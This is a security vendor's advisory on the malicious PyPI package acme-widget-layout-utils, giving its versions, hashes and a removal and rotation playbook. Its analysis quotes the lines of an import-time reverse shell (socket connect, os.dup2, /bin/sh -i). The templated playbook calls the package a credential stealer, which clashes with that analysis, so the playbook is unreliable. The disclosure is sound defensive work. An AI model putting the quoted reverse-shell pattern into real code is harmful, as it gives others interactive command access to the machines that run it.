Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

acme-widget-layout-utilsPyPI

Malicious code in acme-widget-layout-utils (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5545
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall acme-widget-layout-utils

What this malware does

On import, src/acme_widget_layout_utils/init.py executes a textbook reverse-shell pattern: it opens a TCP socket, duplicates the socket file descriptor onto stdin/stdout/stderr via os.dup2, and execs /bin/sh -i (lines 11-16: _sock.connect(("127.0.0.1", 1)); os.dup2(_sock.fileno(), 0);...; subprocess.call(["/bin/sh", "-i"])). The hardcoded destination 127.0.0.1:1 is intentionally unreachable in a default environment, but the code is a fully functional reverse shell — any environment that has a listener on that endpoint, that proxies loopback, or that is patched to redirect the connection receives an interactive shell with the importing process's privileges. The package additionally writes a marker file /tmp/pypi_install_hook_marker.txt from a custom setup.py install cmdclass during pip install, and the package is published under a generic widget-layout-utils name despite its pyproject description acknowledging it is a 'pipeline hook probe' with no advertised utility. The name/purpose mismatch increases the risk of accidental installation. Shipping live reverse-shell code on public PyPI under a benign name is unsafe regardless of the author's stated 'security probe' intent.

During import, the package starts a reverse shell.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-acme-widget-layout-utils

Reasons (based on the campaign):

  • The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.

Malicious versions

3 flagged
0.0.10.0.20.0.3

Indicators of compromise (SHA-256)

42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600
643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8
ff800752007d4e55ddc8172e04c8d75ac04d61b499cc58d97f016cd34d70d6c4
b88682f3976ea35b55757e68f5e744aab7e1430ad10ec124d24e04c57f16395c
e064e5dff118c8fce647eedba53e2b2ce164103979a418ee9a149c9355d829f4

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for acme-widget-layout-utils (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging acme-widget-layout-utils across your stack and pipelines.

  2. If you installed it — respond

    acme-widget-layout-utils is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If acme-widget-layout-utils was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks acme-widget-layout-utils before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. acme-widget-layout-utils on PyPI has been identified as a malicious package (versions 0.0.1, 0.0.2, 0.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0053572026-06-acme-widget-layout-utilsIN-MAL-2026-006199IN-MAL-2026-008153

References

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

Detect & block this

O3 blocks acme-widget-layout-utils-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

acme-widget-layout-utils (PyPI) malicious package — MAL-2026-5545 | O3 Security